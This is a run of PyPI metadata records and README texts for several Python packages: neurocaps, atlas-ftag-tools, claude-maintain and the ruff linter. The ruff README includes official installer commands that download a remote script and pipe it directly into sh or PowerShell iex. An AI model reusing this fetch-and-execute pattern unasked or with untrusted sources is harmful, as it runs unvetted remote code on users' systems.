[ "Intended Audience :: Education", "Intended Audience :: Science/Research", "Topic :: Scientific/Engineering", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", "Programming Language :: ...
[]
null
null
>=3.9.0
[]
[]
[]
[ "numpy>=1.26.3", "pandas>=2.1.0", "joblib>=1.3.0", "matplotlib>=3.6.0", "seaborn>=0.11.0", "kneed>=0.8.5", "nibabel>=5.0.0", "nilearn>=0.10.4", "scikit-learn>=1.4.0", "scipy>=1.10.0", "brainspace>=0.1.16", "surfplot>=0.2.0", "neuromaps>=0.0.5", "pybids>=0.16.5; platform_system != \"Windows...
[]
[]
[]
[ "Homepage, https://neurocaps.readthedocs.io", "Github, https://github.com/donishadsmith/neurocaps", "Issues, https://github.com/donishadsmith/neurocaps/issues", "Changelog, https://neurocaps.readthedocs.io/en/stable/changelog.html" ]
twine/6.2.0 CPython/3.9.25
2026-02-19T22:33:52.434898
neurocaps-0.37.2.tar.gz
117,146
ad/78/8f9f4fb0c1ef3eb5d947ce904c5a2e724a189f0647e329051cd68b239d8b/neurocaps-0.37.2.tar.gz
source
sdist
null
false
25275fda4876bf4e919b44b76a9072f3
8fa4021b72ad0dd66d8ccf80d6079ead2a5430828a9f465612b22961abb0b434
ad788f9f4fb0c1ef3eb5d947ce904c5a2e724a189f0647e329051cd68b239d8b
MIT
[ "LICENSE.md" ]
238
2.4
atlas-ftag-tools
0.3.1
ATLAS Flavour Tagging Tools
[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black) [![Docs](https://img.shields.io/badge/info-documentation-informational)](https://umami-hep.github.io/atlas-ftag-tools/main) [![PyPI version](https://badge.fury.io/py/atlas-ftag-tools.svg)](https://badge.fury.io/py/atlas-ftag-tools) [![codecov](https://codecov.io/gh/umami-hep/atlas-ftag-tools/branch/main/graph/badge.svg?token=MBHLIYYQ7I)](https://codecov.io/gh/umami-hep/atlas-ftag-tools) # ATLAS FTAG Python Tools This is a collection of Python tools for working with files produced with the FTAG [ntuple dumper](https://gitlab.cern.ch/atlas-flavor-tagging-tools/training-dataset-dumper/). The code is intended to be used as a [library](https://iscinumpy.dev/post/app-vs-library/) for other projects. Please see the [example notebook](ftag/example.ipynb) for usage. # Quickstart ## Installation If you want to use this package without modification, you can install from [pypi](https://pypi.org/project/atlas-ftag-tools/) using `pip`. ```bash pip install atlas-ftag-tools ``` To additionally install the development dependencies (for formatting and linting), use ```bash pip install atlas-ftag-tools[dev] ``` ## Usage Extensive examples are given in the [Examples](https://umami-hep.github.io/atlas-ftag-tools/main/examples/index.html)
text/markdown
Sam Van Stroud, Philipp Gadow, Alexander Froch
null
null
null
MIT
null
[]
[]
null
null
<3.12,>=3.10
[]
[]
[]
[ "h5py>=3.14.0", "numpy>=2.2.6", "PyYAML>=6.0.2", "scipy>=1.15.3", "ipykernel>=6.30.1; extra == \"dev\"", "mypy>=1.18.1; extra == \"dev\"", "pre-commit>=4.3.0; extra == \"dev\"", "pydoclint>=0.7.3; extra == \"dev\"", "pytest_notebook>=0.10.0; extra == \"dev\"", "pytest-cov>=7.0.0; extra == \"dev\""...
[]
[]
[]
[ "Homepage, https://github.com/umami-hep/atlas-ftag-tools/", "Issue Tracker, https://github.com/umami-hep/atlas-ftag-tools/issues" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:33:48.840975
atlas_ftag_tools-0.3.1.tar.gz
51,801
5a/75/738c7133a4e17486a490cee9cbaa17a94e749852a0f8c254d689c02113e1/atlas_ftag_tools-0.3.1.tar.gz
source
sdist
null
false
264d431f5c8fffc1d45c4d01be0c6d42
4df4892da0330c250ba7945c68f2f8b641ac2154ef109445cc2df0b0f6d754ab
5a75738c7133a4e17486a490cee9cbaa17a94e749852a0f8c254d689c02113e1
null
[ "LICENSE" ]
294
2.4
claude-maintain
0.1.0
Environment maintenance tool for Claude Code (~/.claude/)
# claude-maintain Environment maintenance tool for [Claude Code](https://claude.com/claude-code) (`~/.claude/`). Diagnoses MCP server health, finds sync debris, analyzes tool usage from session logs, and produces a health score with prioritized recommendations. ## Install ```bash # With uv (recommended) uv tool install claude-maintain # With pip pip install claude-maintain # Development (editable) git clone https://github.com/HermeticOrmus/claude-maintain.git cd claude-maintain uv tool install -e . ``` ## Commands ### `maintain health` -- MCP Server Health Check Parses both Claude Code CLI (`~/.claude/mcp.json`) and Claude Desktop (`claude_desktop_config.json`) configs. Detects: - Placeholder API keys (`YOUR_OPENAI_API_KEY_HERE`) - Cross-platform path issues (Linux paths on Windows, synced via Syncthing/rsync) - Duplicate services (e.g., 4 Telegram variants) - Missing required environment variables ```bash maintain health # Show health report maintain health --generate-clean # Save fixed configs to ~/.claude/reports/ ``` ### `maintain clean` -- Environment Cleanup Finds accumulated debris in `~/.claude/`: - Syncthing conflict files (`*.sync-conflict-*`) - Orphaned files (`.backup`, `.broken`, `.old`) - Stale session logs (configurable age threshold) - Skill naming inconsistencies (`SKILL.md` vs `skill.md`) - Directory size breakdown ```bash maintain clean # Dry run (shows what would be cleaned) maintain clean --execute # Move debris to ~/.claude/backups/ (safe, reversible) maintain clean --max-age 60 # Flag sessions older than 60 days ``` ### `maintain stats` -- Usage Analytics Stream-parses session JSONL files to extract tool usage patterns: - Per-tool invocation counts (Read, Bash, Write, MCP tools, etc.) 
- Skill usage tracking (which `/skills` are actually used) - Cross-reference with filesystem (find never-invoked skills) - Results cached for fast repeat runs ```bash maintain stats # Full scan (all sessions, cached) maintain stats --recent 20 # Only 20 most recent sessions maintain stats --no-cache # Force fresh parse ``` ### `maintain optimize` -- Health Score + Recommendations Runs all three modules and synthesizes a weighted health score (0-100): | Category | Weight | |----------|--------| | MCP Health | 25 | | Storage | 20 | | Skills | 20 | | Plugins | 15 | | Sync Cleanliness | 10 | | Naming Consistency | 10 | Produces prioritized recommendations (CRITICAL / HIGH / MEDIUM / LOW) and saves a markdown report to `~/.claude/reports/`. ```bash maintain optimize # Full analysis + score ``` ## JSON Output All commands support `--json` for machine-readable output: ```bash maintain --json health # JSON health report maintain --json stats # JSON usage data maintain --json optimize # JSON score + recommendations ``` ## Safety - **Dry run by default** -- `maintain clean` shows what it would do without acting - **Backups before deletion** -- `--execute` moves files to `~/.claude/backups/maintain-{timestamp}/` - **Never overwrites configs** -- `--generate-clean` writes fixed versions to `~/.claude/reports/` - **Never logs secrets** -- API tokens are flagged as a security concern but never displayed in reports ## Who is this for? Anyone who: - Uses Claude Code across multiple machines (Syncthing, rsync, cloud sync) - Has accumulated MCP servers they've experimented with - Wants to know which of their 100+ skills are actually used - Has never cleaned `~/.claude/` and suspects it's grown large ## Requirements - Python 3.10+ - Claude Code installed (`~/.claude/` directory exists) ## License MIT
text/markdown
null
Ormus <ormus@ormus.solutions>
null
null
null
claude, claude-code, cli, maintenance, mcp
[ "Development Status :: 4 - Beta", "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Programming Language :: Python :: 3.12", ...
[]
null
null
>=3.10
[]
[]
[]
[ "click>=8.1", "rich>=13.0" ]
[]
[]
[]
[ "Homepage, https://github.com/HermeticOrmus/claude-maintain", "Repository, https://github.com/HermeticOrmus/claude-maintain", "Issues, https://github.com/HermeticOrmus/claude-maintain/issues" ]
uv/0.9.8
2026-02-19T22:33:45.692913
claude_maintain-0.1.0.tar.gz
17,080
44/2c/eda04acacaaa7ef74b39e93ab01a6806f94b2b898c7c9de1d8b977107edf/claude_maintain-0.1.0.tar.gz
source
sdist
null
false
e5c71600c8cef7a7d4b9e1575f3d9f35
c17428d5af65f774186d6966ca45f5abbb5c65bcb4c7b87d8f23a31548313b6f
442ceda04acacaaa7ef74b39e93ab01a6806f94b2b898c7c9de1d8b977107edf
MIT
[ "LICENSE" ]
235
2.4
ruff
0.15.2
An extremely fast Python linter and code formatter, written in Rust.
<!-- Begin section: Overview --> # Ruff [![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff) [![image](https://img.shields.io/pypi/v/ruff.svg)](https://pypi.python.org/pypi/ruff) [![image](https://img.shields.io/pypi/l/ruff.svg)](https://github.com/astral-sh/ruff/blob/main/LICENSE) [![image](https://img.shields.io/pypi/pyversions/ruff.svg)](https://pypi.python.org/pypi/ruff) [![Actions status](https://github.com/astral-sh/ruff/workflows/CI/badge.svg)](https://github.com/astral-sh/ruff/actions) [![Discord](https://img.shields.io/badge/Discord-%235865F2.svg?logo=discord&logoColor=white)](https://discord.com/invite/astral-sh) [**Docs**](https://docs.astral.sh/ruff/) | [**Playground**](https://play.ruff.rs/) An extremely fast Python linter and code formatter, written in Rust. <p align="center"> <img alt="Shows a bar chart with benchmark results." src="https://user-images.githubusercontent.com/1309177/232603516-4fb4892d-585c-4b20-b810-3db9161831e4.svg"> </p> <p align="center"> <i>Linting the CPython codebase from scratch.</i> </p> - ⚡️ 10-100x faster than existing linters (like Flake8) and formatters (like Black) - 🐍 Installable via `pip` - 🛠️ `pyproject.toml` support - 🤝 Python 3.14 compatibility - ⚖️ Drop-in parity with [Flake8](https://docs.astral.sh/ruff/faq/#how-does-ruffs-linter-compare-to-flake8), isort, and [Black](https://docs.astral.sh/ruff/faq/#how-does-ruffs-formatter-compare-to-black) - 📦 Built-in caching, to avoid re-analyzing unchanged files - 🔧 Fix support, for automatic error correction (e.g., automatically remove unused imports) - 📏 Over [800 built-in rules](https://docs.astral.sh/ruff/rules/), with native re-implementations of popular Flake8 plugins, like flake8-bugbear - ⌨️ First-party [editor integrations](https://docs.astral.sh/ruff/editors) for [VS Code](https://github.com/astral-sh/ruff-vscode) and 
[more](https://docs.astral.sh/ruff/editors/setup) - 🌎 Monorepo-friendly, with [hierarchical and cascading configuration](https://docs.astral.sh/ruff/configuration/#config-file-discovery) Ruff aims to be orders of magnitude faster than alternative tools while integrating more functionality behind a single, common interface. Ruff can be used to replace [Flake8](https://pypi.org/project/flake8/) (plus dozens of plugins), [Black](https://github.com/psf/black), [isort](https://pypi.org/project/isort/), [pydocstyle](https://pypi.org/project/pydocstyle/), [pyupgrade](https://pypi.org/project/pyupgrade/), [autoflake](https://pypi.org/project/autoflake/), and more, all while executing tens or hundreds of times faster than any individual tool. Ruff is extremely actively developed and used in major open-source projects like: - [Apache Airflow](https://github.com/apache/airflow) - [Apache Superset](https://github.com/apache/superset) - [FastAPI](https://github.com/tiangolo/fastapi) - [Hugging Face](https://github.com/huggingface/transformers) - [Pandas](https://github.com/pandas-dev/pandas) - [SciPy](https://github.com/scipy/scipy) ...and [many more](#whos-using-ruff). Ruff is backed by [Astral](https://astral.sh), the creators of [uv](https://github.com/astral-sh/uv) and [ty](https://github.com/astral-sh/ty). Read the [launch post](https://astral.sh/blog/announcing-astral-the-company-behind-ruff), or the original [project announcement](https://notes.crmarsh.com/python-tooling-could-be-much-much-faster). ## Testimonials [**Sebastián Ramírez**](https://twitter.com/tiangolo/status/1591912354882764802), creator of [FastAPI](https://github.com/tiangolo/fastapi): > Ruff is so fast that sometimes I add an intentional bug in the code just to confirm it's actually > running and checking the code. 
[**Nick Schrock**](https://twitter.com/schrockn/status/1612615862904827904), founder of [Elementl](https://www.elementl.com/), co-creator of [GraphQL](https://graphql.org/): > Why is Ruff a gamechanger? Primarily because it is nearly 1000x faster. Literally. Not a typo. On > our largest module (dagster itself, 250k LOC) pylint takes about 2.5 minutes, parallelized across 4 > cores on my M1. Running ruff against our _entire_ codebase takes .4 seconds. [**Bryan Van de Ven**](https://github.com/bokeh/bokeh/pull/12605), co-creator of [Bokeh](https://github.com/bokeh/bokeh/), original author of [Conda](https://docs.conda.io/en/latest/): > Ruff is ~150-200x faster than flake8 on my machine, scanning the whole repo takes ~0.2s instead of > ~20s. This is an enormous quality of life improvement for local dev. It's fast enough that I added > it as an actual commit hook, which is terrific. [**Timothy Crosley**](https://twitter.com/timothycrosley/status/1606420868514877440), creator of [isort](https://github.com/PyCQA/isort): > Just switched my first project to Ruff. Only one downside so far: it's so fast I couldn't believe > it was working till I intentionally introduced some errors. [**Tim Abbott**](https://github.com/zulip/zulip/pull/23431#issuecomment-1302557034), lead developer of [Zulip](https://github.com/zulip/zulip) (also [here](https://github.com/astral-sh/ruff/issues/465#issuecomment-1317400028)): > This is just ridiculously fast... `ruff` is amazing. <!-- End section: Overview --> ## Table of Contents For more, see the [documentation](https://docs.astral.sh/ruff/). 1. [Getting Started](#getting-started) 1. [Configuration](#configuration) 1. [Rules](#rules) 1. [Contributing](#contributing) 1. [Support](#support) 1. [Acknowledgements](#acknowledgements) 1. [Who's Using Ruff?](#whos-using-ruff) 1. [License](#license) ## Getting Started<a id="getting-started"></a> For more, see the [documentation](https://docs.astral.sh/ruff/). 
### Installation Ruff is available as [`ruff`](https://pypi.org/project/ruff/) on PyPI. Invoke Ruff directly with [`uvx`](https://docs.astral.sh/uv/): ```shell uvx ruff check # Lint all files in the current directory. uvx ruff format # Format all files in the current directory. ``` Or install Ruff with `uv` (recommended), `pip`, or `pipx`: ```shell # With uv. uv tool install ruff@latest # Install Ruff globally. uv add --dev ruff # Or add Ruff to your project. # With pip. pip install ruff # With pipx. pipx install ruff ``` Starting with version `0.5.0`, Ruff can be installed with our standalone installers: ```shell # On macOS and Linux. curl -LsSf https://astral.sh/ruff/install.sh | sh # On Windows. powershell -c "irm https://astral.sh/ruff/install.ps1 | iex" # For a specific version. curl -LsSf https://astral.sh/ruff/0.15.2/install.sh | sh powershell -c "irm https://astral.sh/ruff/0.15.2/install.ps1 | iex" ``` You can also install Ruff via [Homebrew](https://formulae.brew.sh/formula/ruff), [Conda](https://anaconda.org/conda-forge/ruff), and with [a variety of other package managers](https://docs.astral.sh/ruff/installation/). ### Usage To run Ruff as a linter, try any of the following: ```shell ruff check # Lint all files in the current directory (and any subdirectories). ruff check path/to/code/ # Lint all files in `/path/to/code` (and any subdirectories). ruff check path/to/code/*.py # Lint all `.py` files in `/path/to/code`. ruff check path/to/code/to/file.py # Lint `file.py`. ruff check @arguments.txt # Lint using an input file, treating its contents as newline-delimited command-line arguments. ``` Or, to run Ruff as a formatter: ```shell ruff format # Format all files in the current directory (and any subdirectories). ruff format path/to/code/ # Format all files in `/path/to/code` (and any subdirectories). ruff format path/to/code/*.py # Format all `.py` files in `/path/to/code`. ruff format path/to/code/to/file.py # Format `file.py`. 
ruff format @arguments.txt # Format using an input file, treating its contents as newline-delimited command-line arguments. ``` Ruff can also be used as a [pre-commit](https://pre-commit.com/) hook via [`ruff-pre-commit`](https://github.com/astral-sh/ruff-pre-commit): ```yaml - repo: https://github.com/astral-sh/ruff-pre-commit # Ruff version. rev: v0.15.2 hooks: # Run the linter. - id: ruff-check args: [ --fix ] # Run the formatter. - id: ruff-format ``` Ruff can also be used as a [VS Code extension](https://github.com/astral-sh/ruff-vscode) or with [various other editors](https://docs.astral.sh/ruff/editors/setup). Ruff can also be used as a [GitHub Action](https://github.com/features/actions) via [`ruff-action`](https://github.com/astral-sh/ruff-action): ```yaml name: Ruff on: [ push, pull_request ] jobs: ruff: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 - uses: astral-sh/ruff-action@v3 ``` ### Configuration<a id="configuration"></a> Ruff can be configured through a `pyproject.toml`, `ruff.toml`, or `.ruff.toml` file (see: [_Configuration_](https://docs.astral.sh/ruff/configuration/), or [_Settings_](https://docs.astral.sh/ruff/settings/) for a complete list of all configuration options). If left unspecified, Ruff's default configuration is equivalent to the following `ruff.toml` file: ```toml # Exclude a variety of commonly ignored directories. exclude = [ ".bzr", ".direnv", ".eggs", ".git", ".git-rewrite", ".hg", ".ipynb_checkpoints", ".mypy_cache", ".nox", ".pants.d", ".pyenv", ".pytest_cache", ".pytype", ".ruff_cache", ".svn", ".tox", ".venv", ".vscode", "__pypackages__", "_build", "buck-out", "build", "dist", "node_modules", "site-packages", "venv", ] # Same as Black. line-length = 88 indent-width = 4 # Assume Python 3.9 target-version = "py39" [lint] # Enable Pyflakes (`F`) and a subset of the pycodestyle (`E`) codes by default. select = ["E4", "E7", "E9", "F"] ignore = [] # Allow fix for all enabled rules (when `--fix` is provided). 
fixable = ["ALL"] unfixable = [] # Allow unused variables when underscore-prefixed. dummy-variable-rgx = "^(_+|(_+[a-zA-Z0-9_]*[a-zA-Z0-9]+?))$" [format] # Like Black, use double quotes for strings. quote-style = "double" # Like Black, indent with spaces, rather than tabs. indent-style = "space" # Like Black, respect magic trailing commas. skip-magic-trailing-comma = false # Like Black, automatically detect the appropriate line ending. line-ending = "auto" ``` Note that, in a `pyproject.toml`, each section header should be prefixed with `tool.ruff`. For example, `[lint]` should be replaced with `[tool.ruff.lint]`. Some configuration options can be provided via dedicated command-line arguments, such as those related to rule enablement and disablement, file discovery, and logging level: ```shell ruff check --select F401 --select F403 --quiet ``` The remaining configuration options can be provided through a catch-all `--config` argument: ```shell ruff check --config "lint.per-file-ignores = {'some_file.py' = ['F841']}" ``` To opt in to the latest lint rules, formatter style changes, interface updates, and more, enable [preview mode](https://docs.astral.sh/ruff/preview/) by setting `preview = true` in your configuration file or passing `--preview` on the command line. Preview mode enables a collection of unstable features that may change prior to stabilization. See `ruff help` for more on Ruff's top-level commands, or `ruff help check` and `ruff help format` for more on the linting and formatting commands, respectively. ## Rules<a id="rules"></a> <!-- Begin section: Rules --> **Ruff supports over 900 lint rules**, many of which are inspired by popular tools like Flake8, isort, pyupgrade, and others. Regardless of the rule's origin, Ruff re-implements every rule in Rust as a first-party feature. 
By default, Ruff enables Flake8's `F` rules, along with a subset of the `E` rules, omitting any stylistic rules that overlap with the use of a formatter, like `ruff format` or [Black](https://github.com/psf/black). If you're just getting started with Ruff, **the default rule set is a great place to start**: it catches a wide variety of common errors (like unused imports) with zero configuration. In [preview](https://docs.astral.sh/ruff/preview/), Ruff enables an expanded set of default rules that includes rules from the `B`, `UP`, and `RUF` categories, as well as many more. If you give the new defaults a try, feel free to leave feedback in the [GitHub discussion](https://github.com/astral-sh/ruff/discussions/23203), where you can also find the new rule set listed in full. <!-- End section: Rules --> Beyond the defaults, Ruff re-implements some of the most popular Flake8 plugins and related code quality tools, including: - [autoflake](https://pypi.org/project/autoflake/) - [eradicate](https://pypi.org/project/eradicate/) - [flake8-2020](https://pypi.org/project/flake8-2020/) - [flake8-annotations](https://pypi.org/project/flake8-annotations/) - [flake8-async](https://pypi.org/project/flake8-async) - [flake8-bandit](https://pypi.org/project/flake8-bandit/) ([#1646](https://github.com/astral-sh/ruff/issues/1646)) - [flake8-blind-except](https://pypi.org/project/flake8-blind-except/) - [flake8-boolean-trap](https://pypi.org/project/flake8-boolean-trap/) - [flake8-bugbear](https://pypi.org/project/flake8-bugbear/) - [flake8-builtins](https://pypi.org/project/flake8-builtins/) - [flake8-commas](https://pypi.org/project/flake8-commas/) - [flake8-comprehensions](https://pypi.org/project/flake8-comprehensions/) - [flake8-copyright](https://pypi.org/project/flake8-copyright/) - [flake8-datetimez](https://pypi.org/project/flake8-datetimez/) - [flake8-debugger](https://pypi.org/project/flake8-debugger/) - [flake8-django](https://pypi.org/project/flake8-django/) - 
[flake8-docstrings](https://pypi.org/project/flake8-docstrings/) - [flake8-eradicate](https://pypi.org/project/flake8-eradicate/) - [flake8-errmsg](https://pypi.org/project/flake8-errmsg/) - [flake8-executable](https://pypi.org/project/flake8-executable/) - [flake8-future-annotations](https://pypi.org/project/flake8-future-annotations/) - [flake8-gettext](https://pypi.org/project/flake8-gettext/) - [flake8-implicit-str-concat](https://pypi.org/project/flake8-implicit-str-concat/) - [flake8-import-conventions](https://github.com/joaopalmeiro/flake8-import-conventions) - [flake8-logging](https://pypi.org/project/flake8-logging/) - [flake8-logging-format](https://pypi.org/project/flake8-logging-format/) - [flake8-no-pep420](https://pypi.org/project/flake8-no-pep420) - [flake8-pie](https://pypi.org/project/flake8-pie/) - [flake8-print](https://pypi.org/project/flake8-print/) - [flake8-pyi](https://pypi.org/project/flake8-pyi/) - [flake8-pytest-style](https://pypi.org/project/flake8-pytest-style/) - [flake8-quotes](https://pypi.org/project/flake8-quotes/) - [flake8-raise](https://pypi.org/project/flake8-raise/) - [flake8-return](https://pypi.org/project/flake8-return/) - [flake8-self](https://pypi.org/project/flake8-self/) - [flake8-simplify](https://pypi.org/project/flake8-simplify/) - [flake8-slots](https://pypi.org/project/flake8-slots/) - [flake8-super](https://pypi.org/project/flake8-super/) - [flake8-tidy-imports](https://pypi.org/project/flake8-tidy-imports/) - [flake8-todos](https://pypi.org/project/flake8-todos/) - [flake8-type-checking](https://pypi.org/project/flake8-type-checking/) - [flake8-use-pathlib](https://pypi.org/project/flake8-use-pathlib/) - [flynt](https://pypi.org/project/flynt/) ([#2102](https://github.com/astral-sh/ruff/issues/2102)) - [isort](https://pypi.org/project/isort/) - [mccabe](https://pypi.org/project/mccabe/) - [pandas-vet](https://pypi.org/project/pandas-vet/) - [pep8-naming](https://pypi.org/project/pep8-naming/) - 
[pydocstyle](https://pypi.org/project/pydocstyle/) - [pygrep-hooks](https://github.com/pre-commit/pygrep-hooks) - [pylint-airflow](https://pypi.org/project/pylint-airflow/) - [pyupgrade](https://pypi.org/project/pyupgrade/) - [tryceratops](https://pypi.org/project/tryceratops/) - [yesqa](https://pypi.org/project/yesqa/) For a complete enumeration of the supported rules, see [_Rules_](https://docs.astral.sh/ruff/rules/). ## Contributing<a id="contributing"></a> Contributions are welcome and highly appreciated. To get started, check out the [**contributing guidelines**](https://docs.astral.sh/ruff/contributing/). You can also join us on [**Discord**](https://discord.com/invite/astral-sh). ## Support<a id="support"></a> Having trouble? Check out the existing issues on [**GitHub**](https://github.com/astral-sh/ruff/issues), or feel free to [**open a new one**](https://github.com/astral-sh/ruff/issues/new). You can also ask for help on [**Discord**](https://discord.com/invite/astral-sh). ## Acknowledgements<a id="acknowledgements"></a> Ruff's linter draws on both the APIs and implementation details of many other tools in the Python ecosystem, especially [Flake8](https://github.com/PyCQA/flake8), [Pyflakes](https://github.com/PyCQA/pyflakes), [pycodestyle](https://github.com/PyCQA/pycodestyle), [pydocstyle](https://github.com/PyCQA/pydocstyle), [pyupgrade](https://github.com/asottile/pyupgrade), and [isort](https://github.com/PyCQA/isort). In some cases, Ruff includes a "direct" Rust port of the corresponding tool. We're grateful to the maintainers of these tools for their work, and for all the value they've provided to the Python community. Ruff's formatter is built on a fork of Rome's [`rome_formatter`](https://github.com/rome/tools/tree/main/crates/rome_formatter), and again draws on both API and implementation details from [Rome](https://github.com/rome/tools), [Prettier](https://github.com/prettier/prettier), and [Black](https://github.com/psf/black). 
Ruff's import resolver is based on the import resolution algorithm from [Pyright](https://github.com/microsoft/pyright). Ruff is also influenced by a number of tools outside the Python ecosystem, like [Clippy](https://github.com/rust-lang/rust-clippy) and [ESLint](https://github.com/eslint/eslint). Ruff is the beneficiary of a large number of [contributors](https://github.com/astral-sh/ruff/graphs/contributors). Ruff is released under the MIT license. ## Who's Using Ruff?<a id="whos-using-ruff"></a> Ruff is used by a number of major open-source projects and companies, including: - [Albumentations](https://github.com/albumentations-team/AlbumentationsX) - Amazon ([AWS SAM](https://github.com/aws/serverless-application-model)) - [Anki](https://apps.ankiweb.net/) - Anthropic ([Python SDK](https://github.com/anthropics/anthropic-sdk-python)) - [Apache Airflow](https://github.com/apache/airflow) - AstraZeneca ([Magnus](https://github.com/AstraZeneca/magnus-core)) - [Babel](https://github.com/python-babel/babel) - Benchling ([Refac](https://github.com/benchling/refac)) - [Bokeh](https://github.com/bokeh/bokeh) - Capital One ([datacompy](https://github.com/capitalone/datacompy)) - CrowdCent ([NumerBlox](https://github.com/crowdcent/numerblox)) <!-- typos: ignore --> - [Cryptography (PyCA)](https://github.com/pyca/cryptography) - CERN ([Indico](https://getindico.io/)) - [DVC](https://github.com/iterative/dvc) - [Dagger](https://github.com/dagger/dagger) - [Dagster](https://github.com/dagster-io/dagster) - Databricks ([MLflow](https://github.com/mlflow/mlflow)) - [Dify](https://github.com/langgenius/dify) - [FastAPI](https://github.com/tiangolo/fastapi) - [Godot](https://github.com/godotengine/godot) - [Gradio](https://github.com/gradio-app/gradio) - [Great Expectations](https://github.com/great-expectations/great_expectations) - [HTTPX](https://github.com/encode/httpx) - [Hatch](https://github.com/pypa/hatch) - [Home Assistant](https://github.com/home-assistant/core) - 
Hugging Face ([Transformers](https://github.com/huggingface/transformers), [Datasets](https://github.com/huggingface/datasets), [Diffusers](https://github.com/huggingface/diffusers)) - IBM ([Qiskit](https://github.com/Qiskit/qiskit)) - ING Bank ([popmon](https://github.com/ing-bank/popmon), [probatus](https://github.com/ing-bank/probatus)) - [Ibis](https://github.com/ibis-project/ibis) - [ivy](https://github.com/unifyai/ivy) - [JAX](https://github.com/jax-ml/jax) - [Jupyter](https://github.com/jupyter-server/jupyter_server) - [Kraken Tech](https://kraken.tech/) - [LangChain](https://github.com/hwchase17/langchain) - [Litestar](https://litestar.dev/) - [LlamaIndex](https://github.com/jerryjliu/llama_index) - Matrix ([Synapse](https://github.com/matrix-org/synapse)) - [MegaLinter](https://github.com/oxsecurity/megalinter) - Meltano ([Meltano CLI](https://github.com/meltano/meltano), [Singer SDK](https://github.com/meltano/sdk)) - Microsoft ([Semantic Kernel](https://github.com/microsoft/semantic-kernel), [ONNX Runtime](https://github.com/microsoft/onnxruntime), [LightGBM](https://github.com/microsoft/LightGBM)) - Modern Treasury ([Python SDK](https://github.com/Modern-Treasury/modern-treasury-python)) - Mozilla ([Firefox](https://github.com/mozilla/gecko-dev)) - [Mypy](https://github.com/python/mypy) - [Nautobot](https://github.com/nautobot/nautobot) - Netflix ([Dispatch](https://github.com/Netflix/dispatch)) - [Neon](https://github.com/neondatabase/neon) - [Nokia](https://nokia.com/) - [NoneBot](https://github.com/nonebot/nonebot2) - [NumPyro](https://github.com/pyro-ppl/numpyro) - [ONNX](https://github.com/onnx/onnx) - [OpenBB](https://github.com/OpenBB-finance/OpenBBTerminal) - [Open Wine Components](https://github.com/Open-Wine-Components/umu-launcher) - [PDM](https://github.com/pdm-project/pdm) - [PaddlePaddle](https://github.com/PaddlePaddle/Paddle) - [Pandas](https://github.com/pandas-dev/pandas) - [Pillow](https://github.com/python-pillow/Pillow) - 
[Poetry](https://github.com/python-poetry/poetry) - [Polars](https://github.com/pola-rs/polars) - [PostHog](https://github.com/PostHog/posthog) - Prefect ([Python SDK](https://github.com/PrefectHQ/prefect), [Marvin](https://github.com/PrefectHQ/marvin)) - [PyInstaller](https://github.com/pyinstaller/pyinstaller) - [PyMC](https://github.com/pymc-devs/pymc/) - [PyMC-Marketing](https://github.com/pymc-labs/pymc-marketing) - [pytest](https://github.com/pytest-dev/pytest) - [PyTorch](https://github.com/pytorch/pytorch) - [Pydantic](https://github.com/pydantic/pydantic) - [Pylint](https://github.com/PyCQA/pylint) - [PyScripter](https://github.com/pyscripter/pyscripter) - [PyVista](https://github.com/pyvista/pyvista) - [Reflex](https://github.com/reflex-dev/reflex) - [River](https://github.com/online-ml/river) - [Rippling](https://rippling.com) - [Robyn](https://github.com/sansyrox/robyn) - [Saleor](https://github.com/saleor/saleor) - Scale AI ([Launch SDK](https://github.com/scaleapi/launch-python-client)) - [SciPy](https://github.com/scipy/scipy) - Snowflake ([SnowCLI](https://github.com/Snowflake-Labs/snowcli)) - [Sphinx](https://github.com/sphinx-doc/sphinx) - [Stable Baselines3](https://github.com/DLR-RM/stable-baselines3) - [Starlette](https://github.com/encode/starlette) - [Streamlit](https://github.com/streamlit/streamlit) - [The Algorithms](https://github.com/TheAlgorithms/Python) - [Vega-Altair](https://github.com/altair-viz/altair) - [Weblate](https://weblate.org/) - WordPress ([Openverse](https://github.com/WordPress/openverse)) - [ZenML](https://github.com/zenml-io/zenml) - [Zulip](https://github.com/zulip/zulip) - [build (PyPA)](https://github.com/pypa/build) - [cibuildwheel (PyPA)](https://github.com/pypa/cibuildwheel) - [delta-rs](https://github.com/delta-io/delta-rs) - [featuretools](https://github.com/alteryx/featuretools) - [meson-python](https://github.com/mesonbuild/meson-python) - [nox](https://github.com/wntrblm/nox) - 
[pip](https://github.com/pypa/pip) ### Show Your Support If you're using Ruff, consider adding the Ruff badge to your project's `README.md`: ```md [![Ruff](https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json)](https://github.com/astral-sh/ruff) ``` ...or `README.rst`: ```rst .. image:: https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json :target: https://github.com/astral-sh/ruff :alt: Ruff ``` ...or, as HTML: ```html <a href="https://github.com/astral-sh/ruff"><img src="https://img.shields.io/endpoint?url=https://raw.githubusercontent.com/astral-sh/ruff/main/assets/badge/v2.json" alt="Ruff" style="max-width:100%;"></a> ``` ## License<a id="license"></a> This repository is licensed under the [MIT License](https://github.com/astral-sh/ruff/blob/main/LICENSE) <div align="center"> <a target="_blank" href="https://astral.sh" style="background:none"> <img src="https://raw.githubusercontent.com/astral-sh/ruff/main/assets/svg/Astral.svg" alt="Made by Astral"> </a> </div>
text/markdown; charset=UTF-8; variant=GFM
null
"Astral Software Inc." <hey@astral.sh>
null
null
null
automation, flake8, pycodestyle, pyflakes, pylint, clippy
[ "Development Status :: 5 - Production/Stable", "Environment :: Console", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8"...
[]
https://docs.astral.sh/ruff
null
>=3.7
[]
[]
[]
[]
[]
[]
[]
